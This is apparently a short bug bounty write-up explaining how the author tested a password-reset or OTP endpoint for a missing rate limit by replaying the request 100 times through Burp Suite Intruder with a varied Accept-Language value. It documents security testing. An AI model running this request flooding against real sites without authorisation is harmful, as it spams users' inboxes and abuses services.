BOOK THIS SPACE FOR AD
ARTICLE ADHi all my name is B1ayn and i am a bug bounty hunter.Today I’m going to tell you how I found my first bug bounty find.
No rate limit is a flaw that doesn’t limit the no of attempts one makes on a website server to extract data. It is a vulnerability which can prove to be critical when misused by attackers. Real Life Example: When you try to login to your account, after 3–4 wrong attempts, your account gets suspended for some hours.
We can esaily find Rate limit in forgot password link Registion page in otp sending .in these tupe of activity we can find rate limit.
1.capture the outgoing request with BurpSuite:
2.Send it to intruder :
clear all,then add only 0.3 Accept-Language: en-US,en;q=$0.3$ like this
3.Going to payload section select number as a payload:
Then send payload 1 from 100(links you want to send ) and in the gap from 1
Start Attack
Wow !! we reicived 100 mails in just 2 min.
Follow me for more writeups!